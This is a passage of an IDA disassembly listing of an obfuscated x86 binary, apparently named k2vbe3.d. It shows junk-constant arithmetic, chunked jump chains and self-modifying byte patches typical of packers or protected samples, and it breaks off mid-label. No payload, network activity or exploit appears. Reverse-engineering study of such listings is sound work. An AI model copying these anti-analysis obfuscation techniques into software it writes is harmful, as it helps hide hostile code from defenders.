loc_44C0E5:				; CODE XREF: k2vbe3.d:004482ECj
		jmp	loc_45B2DD
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F31

loc_44C0EA:				; CODE XREF: sub_442F31+14j
		jmp	loc_445FA3
; END OF FUNCTION CHUNK	FOR sub_442F31
; ---------------------------------------------------------------------------

loc_44C0EF:				; CODE XREF: k2vbe3.d:0045A6C4j
		rol	eax, 0Fh
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_44C0F2:				; CODE XREF: sub_43DFE1:loc_4498E6j
		xor	eax, 8E960510h
		sub	eax, 640D72A0h
		rol	eax, 1Eh
		push	ebx
		push	5708D56Bh
		pop	ebx
		jmp	loc_43F6CB
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_115. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456541

loc_44C10E:				; CODE XREF: sub_456541-1E87j
					; sub_456541-1E7Aj
		jns	loc_444A36
		call	sub_45A9B3

loc_44C119:				; DATA XREF: sub_4426DF:loc_45AC6Do
		or	eax, eax
		jnz	loc_44775C
		jmp	loc_456291
; END OF FUNCTION CHUNK	FOR sub_456541
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6BD

loc_44C126:				; CODE XREF: sub_44A6BD+1076Cj
		jbe	loc_440B1F
; END OF FUNCTION CHUNK	FOR sub_44A6BD
; START	OF FUNCTION CHUNK FOR sub_44B979

loc_44C12C:				; CODE XREF: sub_44B979:loc_440726j
		push	1
		lea	eax, [ebp+var_800]
		call	sub_457A42

loc_44C139:				; CODE XREF: sub_4467A1+13B49j
		jmp	loc_45B259
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FECA

loc_44C13E:				; CODE XREF: sub_43FECA+Cj
		jmp	loc_43FCB7
; END OF FUNCTION CHUNK	FOR sub_43FECA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447266

loc_44C143:				; CODE XREF: sub_447266-7554j
		jmp	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_447266
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442053

loc_44C148:				; CODE XREF: sub_442053:loc_45206Aj
		jz	loc_45840E
		jmp	loc_43CC6A
; END OF FUNCTION CHUNK	FOR sub_442053
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456471

loc_44C153:				; CODE XREF: sub_456471:loc_43E867j
		sub	edx, eax

loc_44C155:				; CODE XREF: k2vbe3.d:loc_44B31Aj
		push	803D644Dh
		pop	ecx
		or	ecx, 376EC7E1h
		xor	ecx, 0B743724Eh
		or	ecx, 0CD520C2Ch
		jmp	loc_441926
; END OF FUNCTION CHUNK	FOR sub_456471
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442675

loc_44C172:				; CODE XREF: sub_442675+15j
		mov	eax, [eax]
		add	eax, [ebp-4]
		mov	[ebp-0Ch], eax
; END OF FUNCTION CHUNK	FOR sub_442675
; START	OF FUNCTION CHUNK FOR sub_442F31

loc_44C17A:				; CODE XREF: sub_4402EF+6j
					; sub_442F31+Bj ...
		call	sub_44FD0D

loc_44C17F:				; CODE XREF: k2vbe3.d:004584DDj
		jnp	loc_45C0FB
		pushf
		jmp	loc_446DF3
; END OF FUNCTION CHUNK	FOR sub_442F31
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D823

loc_44C18B:				; CODE XREF: sub_43D823:loc_4554D2j
		mov	dword ptr [eax], 594C4C4Fh
		lea	eax, [ebp-1Ch]
		mov	dword ptr [eax], offset	dword_474244
		push	0
		lea	eax, [ebp-20h]
		jmp	loc_457184
; END OF FUNCTION CHUNK	FOR sub_43D823
; ---------------------------------------------------------------------------

loc_44C1A4:				; CODE XREF: k2vbe3.d:loc_444FC3j
		rol	esi, 0Fh
		add	esi, 0E0E55068h
		push	offset loc_450687
		jmp	loc_43CA75
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449EF8

loc_44C1B8:				; CODE XREF: sub_449EF8+18j
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_449EF8

; =============== S U B	R O U T	I N E =======================================



sub_44C1BD	proc near		; CODE XREF: sub_444297:loc_43F533p
					; sub_442556+5p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C2BD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DB92 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004404EF SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00441189 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044143F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004431B0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044964F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044C3F3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EBD8 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044F4E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456655 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457811 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0045987F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AB34 SIZE 00000019 BYTES

		js	loc_4404EF
		push	edx
		mov	edx, ebp
		xchg	edx, [esp+0]
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		jmp	loc_45AB34
sub_44C1BD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44866A

loc_44C1D3:				; CODE XREF: sub_44866A:loc_444884j
					; sub_44866A:loc_4582D1j
		jnz	loc_4430D9
		mov	ecx, [ebx+edx-4]
		or	ecx, ecx

loc_44C1DF:				; CODE XREF: sub_44CA73+919j
		jz	loc_445424

loc_44C1E5:				; CODE XREF: sub_45A323:loc_44F90Ej
		mov	ebx, [ebx+ecx]
		call	sub_43FB9B
		jmp	loc_445424
; END OF FUNCTION CHUNK	FOR sub_44866A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446964

loc_44C1F2:				; CODE XREF: sub_446964:loc_45164Dj
		jz	loc_44054D
		jmp	loc_44B18B
; END OF FUNCTION CHUNK	FOR sub_446964

; =============== S U B	R O U T	I N E =======================================



sub_44C1FD	proc near		; DATA XREF: k2vbe3.d:loc_447915o
		call	sub_45A309
		lea	eax, sub_44F570
		push	edi
		call	sub_443012
sub_44C1FD	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43DEFF

loc_44C20E:				; CODE XREF: sub_43DEFF+10j
		jmp	loc_446C15
; END OF FUNCTION CHUNK	FOR sub_43DEFF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4461D5

loc_44C213:				; CODE XREF: sub_4461D5+5A8Aj
		jz	loc_449115
		jmp	loc_45961A
; END OF FUNCTION CHUNK	FOR sub_4461D5
; ---------------------------------------------------------------------------

loc_44C21E:				; CODE XREF: k2vbe3.d:0044C94Bj
		jns	loc_440090

; =============== S U B	R O U T	I N E =======================================



sub_44C224	proc near		; CODE XREF: k2vbe3.d:004482D2p

; FUNCTION CHUNK AT 00449FDA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451CD9 SIZE 00000007 BYTES

		xchg	esi, [esp+0]
		pop	esi
		add	edx, 78CA4467h
		add	edx, ecx
		add	edx, 0A603CC65h
		jmp	loc_449FDA
sub_44C224	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	ebx, ebp
		jmp	loc_452CF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44367E

loc_44C242:				; CODE XREF: sub_44367E+1D9Bj
		add	eax, 6D802Bh
		mov	eax, [eax]
		pushf
		push	offset sub_446353
		jmp	loc_447AF5
; END OF FUNCTION CHUNK	FOR sub_44367E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44C255:				; CODE XREF: sub_44C90E:loc_44BCF3j
		push	44C976C6h
		pop	eax
		or	eax, 0E06324CCh
		cmp	eax, 62D619ADh
		jmp	loc_44D685
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_44C26C:				; CODE XREF: sub_449372+A90Ej
		pop	ebx
		xchg	ebx, [esp-8+arg_0]

loc_44C270:				; CODE XREF: k2vbe3.d:00449866j
		mov	edx, ebx
		pop	ebx
		xchg	eax, [esp-0Ch+arg_4]
		push	eax
		jmp	loc_44690D
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_44C27C:				; CODE XREF: k2vbe3.d:loc_445E82j
					; sub_45101A:loc_446933j ...
		push	offset loc_441931
		jmp	loc_450DE2
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4401FF

loc_44C286:				; CODE XREF: sub_4401FF-1481j
		xchg	eax, edx
		not	edi
		adc	ebp, ecx
		cdq

loc_44C28D:				; CODE XREF: sub_4401FF:loc_44ADD6j
		push	offset sub_450A99
		jmp	nullsub_533
; END OF FUNCTION CHUNK	FOR sub_4401FF

; =============== S U B	R O U T	I N E =======================================



sub_44C297	proc near		; DATA XREF: sub_450F71:loc_444224o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043D23F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D725 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004562E6 SIZE 0000001A BYTES

		cdq
		add	eax, [esp+0]
		adc	edx, [esp+arg_0]
		jnz	loc_43D23F
		add	esp, 8
		mov	eax, [eax]
		jmp	loc_44D725
sub_44C297	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A980

loc_44C2AF:				; CODE XREF: sub_44A980:loc_44536Ej
		xor	ebx, 0DEDC75E7h
		add	ebx, 8CEF88CCh
		xchg	ebx, [esp+8+var_8]
		jmp	sub_4508A3
; END OF FUNCTION CHUNK	FOR sub_44A980
; ---------------------------------------------------------------------------
		mov	ds:dword_442828, eax
		cmp	ds:dword_442828, 0
		jnz	loc_458C1A
		jmp	loc_449F37
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B4A2

loc_44C2DA:				; CODE XREF: sub_45B4A2-17EFFj
		pop	edx
		rol	edx, 1
		add	edx, 0FA6E7B79h
		mov	edx, [edx]
		or	edx, edx
		jnz	loc_44BA7B
		jmp	loc_44E684
; END OF FUNCTION CHUNK	FOR sub_45B4A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_44C2F2:				; CODE XREF: sub_457D4B-763Ej
		xor	ebx, eax
		jno	loc_45ABE1
		cmp	edx, 28F2CB92h
		jmp	loc_45AD00
; END OF FUNCTION CHUNK	FOR sub_457D4B

; =============== S U B	R O U T	I N E =======================================



sub_44C305	proc near		; DATA XREF: k2vbe3.d:0043C190o

; FUNCTION CHUNK AT 00453AFF SIZE 00000005 BYTES

		push	edi
		push	offset loc_44CB1D
		jmp	loc_453AFF
sub_44C305	endp


; =============== S U B	R O U T	I N E =======================================



sub_44C310	proc near		; CODE XREF: k2vbe3.d:00443237j
					; sub_446E24+13398p

var_8		= dword	ptr -8
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00455182 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00455390 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045764A SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		xchg	edx, [esp-4+arg_0]
		push	0
		push	10h
		mov	eax, [ebp+8]
		push	ebx
		mov	ebx, eax
		jmp	loc_45764A
sub_44C310	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_44C326:				; CODE XREF: sub_4426DF+14j
		jz	loc_44AA23
		jmp	loc_443E98
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------

loc_44C331:				; CODE XREF: k2vbe3.d:0044548Ej
		adc	eax, 761E5449h
		or	edi, ecx
		rol	eax, 0Fh
; START	OF FUNCTION CHUNK FOR sub_440EE3

loc_44C33C:				; CODE XREF: sub_440EE3:loc_445476j
		xor	edi, 0A62840F4h
		xor	eax, edi
		jmp	loc_450C11
; END OF FUNCTION CHUNK	FOR sub_440EE3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4575BD

loc_44C349:				; CODE XREF: sub_4575BD:loc_440523j
		jbe	nullsub_9
		rol	ebx, 10h
		jmp	loc_449724
; END OF FUNCTION CHUNK	FOR sub_4575BD

; =============== S U B	R O U T	I N E =======================================



sub_44C357	proc near		; CODE XREF: k2vbe3.d:0044A01Ej
					; k2vbe3.d:0044DC60p
		xchg	esi, [esp+0]
		pop	esi
		push	5B4E1246h
		pop	ecx
sub_44C357	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44B999

loc_44C361:				; CODE XREF: sub_44B999:loc_44D921j
		jmp	loc_451E88
; END OF FUNCTION CHUNK	FOR sub_44B999

; =============== S U B	R O U T	I N E =======================================



sub_44C366	proc near		; DATA XREF: k2vbe3.d:0044CA22o
		pop	edx
		lea	eax, sub_44081A
		mov	byte ptr [eax],	0C3h
		jmp	sub_44081A
sub_44C366	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_41976B

loc_44C375:				; CODE XREF: sub_41976B+Dj
					; sub_41976B:loc_44EEF3j
					; DATA XREF: ...
		call	sub_44EEFE
		jmp	loc_4401FA
; END OF FUNCTION CHUNK	FOR sub_41976B
; ---------------------------------------------------------------------------

loc_44C37F:				; CODE XREF: k2vbe3.d:00450E55j
		mov	dword ptr [ebp-18h], 0
; START	OF FUNCTION CHUNK FOR sub_4402EF

loc_44C386:				; CODE XREF: sub_4402EFj
		mov	eax, [ebp-4]
		mov	edx, [ebp-14h]
		add	eax, [edx+20h]
		call	sub_4524D2
; END OF FUNCTION CHUNK	FOR sub_4402EF
; START	OF FUNCTION CHUNK FOR sub_45744C

loc_44C394:				; CODE XREF: sub_45744C+1A00j
		jmp	sub_44B2D7
; END OF FUNCTION CHUNK	FOR sub_45744C
; ---------------------------------------------------------------------------

locret_44C399:				; CODE XREF: k2vbe3.d:loc_459ED2j
		retn
; ---------------------------------------------------------------------------
		jmp	loc_4416E5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_331. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44C3A0:				; CODE XREF: k2vbe3.d:0045A12Dj
		jmp	loc_45B679
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_44C3A5:				; CODE XREF: sub_43DFE1+4D7Ej
		jmp	sub_44A79B
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44083C

loc_44C3AA:				; CODE XREF: sub_44083C:loc_456160j
					; sub_44083C+19A90j
		push	1011C139h
		pop	eax
		sub	eax, 79CE9EF2h
		test	eax, 20h
		jmp	loc_45332F
; END OF FUNCTION CHUNK	FOR sub_44083C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_44C3C1:				; CODE XREF: k2vbe3.d:004513EEj
					; sub_445124+14E72j
		sub	esi, ds:4000F0h
		test	esi, 40000h
		jmp	loc_4493D2
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_44C3D2:				; CODE XREF: sub_44ED3C-B7FBj
		jnp	loc_4474DF

loc_44C3D8:				; CODE XREF: k2vbe3.d:loc_442D89j
					; sub_44ED3C:loc_44EB1Bj ...
		jmp	loc_44A62D
; ---------------------------------------------------------------------------

loc_44C3DD:				; CODE XREF: k2vbe3.d:loc_4435C8j
					; sub_44ED3C+8BCEj
		push	eax
		push	0D3CBE40Fh
		pop	eax
		or	eax, 0D32D822Dh
		rol	eax, 0Ch
		jmp	loc_457B44
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_209. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C1BD

loc_44C3F3:				; CODE XREF: sub_44C1BD+E98Bj
		jmp	loc_43C2BD
; END OF FUNCTION CHUNK	FOR sub_44C1BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459D58

loc_44C3F8:				; CODE XREF: sub_459D58-1042Dj
		jmp	loc_442444
; END OF FUNCTION CHUNK	FOR sub_459D58
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F174

loc_44C3FD:				; CODE XREF: sub_44F174-E4C4j
		jmp	sub_45B74D
; END OF FUNCTION CHUNK	FOR sub_44F174
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_44C402:				; CODE XREF: sub_4553CC-1485Ej
		jnz	loc_43EF2E
		jmp	loc_43DA3F
; END OF FUNCTION CHUNK	FOR sub_4553CC

; =============== S U B	R O U T	I N E =======================================



sub_44C40D	proc near		; DATA XREF: sub_43D7A9+103F0o
		xor	eax, 4158F2D4h
		add	eax, ebp
		add	eax, 6F59807Eh
		mov	eax, [eax]
		push	eax
		call	sub_446964
sub_44C40D	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44B979

loc_44C423:				; CODE XREF: sub_43FF59+1990j
					; sub_457A42:loc_446F34j ...
		mov	esp, ebp
		pop	ebp
		jmp	nullsub_83
; END OF FUNCTION CHUNK	FOR sub_44B979
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FCA0

loc_44C42B:				; CODE XREF: sub_43FCA0+88D8j
		jnz	loc_44FB41
		jmp	loc_44EE72
; END OF FUNCTION CHUNK	FOR sub_43FCA0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_292. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D023

loc_44C437:				; CODE XREF: sub_43D023:loc_43D02Fj
		jmp	loc_440AF5
; END OF FUNCTION CHUNK	FOR sub_43D023
; ---------------------------------------------------------------------------

loc_44C43C:				; DATA XREF: sub_44E388-9E35o
		add	eax, ebp
		add	eax, 3DD89E2Dh
		push	offset loc_4538E3
		jmp	loc_43F64F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_44C44E:				; CODE XREF: sub_43DEBE+1DD4Cj
		jnb	loc_450332
		sub	edx, 3F98092h
		jmp	loc_4446E6
; END OF FUNCTION CHUNK	FOR sub_43DEBE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B8EF

loc_44C45F:				; CODE XREF: sub_44B8EF+12j
		xor	eax, 0F632C9FEh
		call	sub_4481FA

loc_44C46A:				; CODE XREF: sub_441DCC-1E85j
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_44B8EF

; =============== S U B	R O U T	I N E =======================================



sub_44C46F	proc near		; DATA XREF: sub_44693E+Bo

; FUNCTION CHUNK AT 0044AB1C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452C10 SIZE 00000011 BYTES

		push	ebx
		push	0B462BFE1h
		pop	ebx
		add	ebx, 717BC1h
		or	ebx, 0E751DA43h
		rol	ebx, 0Fh
		add	ebx, 24FE496h
		jmp	loc_44AB1C
sub_44C46F	endp

; ---------------------------------------------------------------------------

loc_44C490:				; DATA XREF: sub_43E6D4o
		call	sub_44C49B
		jmp	ds:off_41E13C

; =============== S U B	R O U T	I N E =======================================



sub_44C49B	proc near		; CODE XREF: sub_445124-84EFj
					; k2vbe3.d:loc_44C490p	...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043CC3A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441655 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00442F86 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00449497 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004559BD SIZE 0000000F BYTES

		jns	loc_43CC3A
		pop	edx
		jmp	loc_4559BD
sub_44C49B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	eax, [edi]
		jmp	sub_44B15C
; ---------------------------------------------------------------------------

loc_44C4AE:				; CODE XREF: k2vbe3.d:004570F2j
		adc	ebp, 0CFF16Dh
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_44C4B4:				; CODE XREF: sub_43F7AC:loc_4570D2j
		add	edx, 59C19413h
		add	eax, edx
		pop	edx
		mov	eax, [eax]
		or	al, al
		jmp	loc_45BF41
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E542

loc_44C4C6:				; CODE XREF: sub_44E542-10940j
		push	edi
		mov	edi, eax
		xchg	edi, [esp+0Ch+var_C]
		push	eax
		call	sub_44F123

loc_44C4D2:				; CODE XREF: sub_44E00F+5DDDj
		jmp	nullsub_132
; END OF FUNCTION CHUNK	FOR sub_44E542
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4570C0

loc_44C4D7:				; CODE XREF: sub_4570C0:loc_43FB2Bj
		jmp	loc_43D52D
; END OF FUNCTION CHUNK	FOR sub_4570C0
; ---------------------------------------------------------------------------

loc_44C4DC:				; DATA XREF: sub_4553CC-12AFFo
		lea	eax, aBoacqdrqFf6+3
		push	eax
		push	eax
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_44C4E4:				; CODE XREF: sub_4553CC:loc_4506B9j
		call	sub_4460FD
; END OF FUNCTION CHUNK	FOR sub_4553CC
; START	OF FUNCTION CHUNK FOR sub_44DAF6

loc_44C4E9:				; CODE XREF: sub_44DAF6-3E50j
		jmp	loc_45716D
; END OF FUNCTION CHUNK	FOR sub_44DAF6
; ---------------------------------------------------------------------------

loc_44C4EE:				; CODE XREF: k2vbe3.d:00443C3Bj
		jmp	loc_458EC1
; ---------------------------------------------------------------------------
		adc	ecx, 70CB4D9Bh
		jmp	sub_456DB3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44316D

loc_44C4FE:				; CODE XREF: sub_44316D+1C03j
		push	edi
		push	0F51FF2EEh
		pop	edi
		and	edi, 171CFFA2h
		jmp	loc_44212F
; END OF FUNCTION CHUNK	FOR sub_44316D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_80. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44881E

loc_44C511:				; CODE XREF: sub_44881E-9BF3j
		jmp	nullsub_75
; END OF FUNCTION CHUNK	FOR sub_44881E
; ---------------------------------------------------------------------------

loc_44C516:				; CODE XREF: k2vbe3.d:0044609Cj
		sbb	edx, ecx
		jp	loc_4475B9
		sub	edi, 0A6DC7BB5h
		jmp	loc_4477C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BDF

loc_44C529:				; CODE XREF: sub_443BDF+EAAFj
		jno	loc_448F73
		jmp	loc_441F93
; END OF FUNCTION CHUNK	FOR sub_443BDF
; ---------------------------------------------------------------------------

loc_44C534:				; CODE XREF: k2vbe3.d:00441E06j
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_446626
; ---------------------------------------------------------------------------

loc_44C542:				; CODE XREF: k2vbe3.d:0045A94Dj
		cmp	ebp, 52007C1Ah

loc_44C548:				; CODE XREF: k2vbe3.d:0044F420j
		jmp	loc_44F06F
; ---------------------------------------------------------------------------

loc_44C54D:				; DATA XREF: k2vbe3.d:0043E7CBo
		push	0F99FFC2Ah
		pop	edx
		sub	edx, 18721883h
		add	edx, 9D9A7958h
		jmp	loc_43D960

; =============== S U B	R O U T	I N E =======================================



sub_44C564	proc near		; CODE XREF: k2vbe3.d:00447C2Cj
					; sub_448D9B:loc_449095p

arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 00449C6A SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00453893 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00454325 SIZE 00000006 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	byte ptr [ebx],	0E9h
		pop	ebx
		pop	ebx
		sub	ebx, ds:4000EEh
		push	ecx
		jmp	loc_449C6A
sub_44C564	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44C579	proc near		; DATA XREF: k2vbe3.d:0043DC60o

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043EAD0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044136E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00446D66 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00449DDC SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00451015 SIZE 00000005 BYTES

		jno	loc_446D66
		mov	eax, [esp+0]
		push	edx
		push	edi
		jmp	loc_449DDC
sub_44C579	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_388. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_44C58A:				; CODE XREF: sub_44469A+15254j
		jmp	loc_4431BD
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DCF5

loc_44C58F:				; CODE XREF: sub_44DCF5-9DD1j
		shr	ecx, 1Ch
		mov	[esi], edi

loc_44C594:				; CODE XREF: sub_44DCF5:loc_44378Aj
		movzx	eax, word ptr [ebp-6]
		mov	[ebp-1Ch], eax
		jmp	loc_458346
; END OF FUNCTION CHUNK	FOR sub_44DCF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_44C5A0:				; CODE XREF: sub_450F71:loc_450F80j
		cmp	dword ptr [ebp-20h], 0
		jge	loc_44B0EB
		jmp	loc_43DFD6
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_44C5AF:				; CODE XREF: sub_44D0D5:loc_44D0E1j
		call	sub_44662B
		test	al, al
		jz	loc_44241E
		jmp	loc_443644
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_258. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44C5C2:				; CODE XREF: k2vbe3.d:0045AE50j
		push	eax
		push	2EA227A1h
		pop	eax
		add	eax, 0B321C376h
		and	eax, 510C8956h
		rol	eax, 7
		and	eax, 57875D58h
		jmp	loc_44F4B9

; =============== S U B	R O U T	I N E =======================================



sub_44C5E3	proc near		; CODE XREF: k2vbe3.d:004448CEp
					; k2vbe3.d:0044B5D0j

arg_0		= dword	ptr  4

		xchg	esi, [esp+0]
		pop	esi
		xchg	esi, [esp-4+arg_0]
		jmp	loc_447B8F
sub_44C5E3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_44C5EF:				; CODE XREF: sub_44921C-321j
		sub	edx, 1FFD4A02h
		add	edx, 2D0BD4EBh
		and	edx, ds:4000F0h
		xor	edx, 80B696Ch
		add	edx, 0F61638DCh
		xchg	edx, [esp+0]
		jmp	sub_44ADEC
; END OF FUNCTION CHUNK	FOR sub_44921C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_124. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_44C616:				; CODE XREF: sub_44C90E+5E64j
		jz	loc_4597F6
		jmp	loc_440C6A
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_44C621:				; CODE XREF: k2vbe3.d:loc_4484BEj
		mov	eax, [esp]
		push	esi
		push	8CD91F4Eh
		pop	esi
		rol	esi, 1
		and	esi, 0B59F9EB0h
		rol	esi, 0Dh
		jmp	loc_44177D
; ---------------------------------------------------------------------------

loc_44C63B:				; DATA XREF: k2vbe3.d:00452679o
		push	0C7901C0Fh
		pop	ebx
		sub	ebx, 583852B4h
		and	ebx, ds:4000E9h
		add	ebx, 5957C2E4h
		xor	eax, ebx
		jmp	loc_45A672
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45227C

loc_44C65A:				; CODE XREF: sub_45227C+Dj
		push	offset sub_44D419
		jmp	nullsub_510
; END OF FUNCTION CHUNK	FOR sub_45227C
; ---------------------------------------------------------------------------

loc_44C664:				; CODE XREF: k2vbe3.d:00452B5Bj
		pushf
		or	edx, 9AE80456h
		test	ebx, esi
		jmp	loc_453F68
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_457. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468FE

loc_44C673:				; CODE XREF: sub_4468FE+EC98j
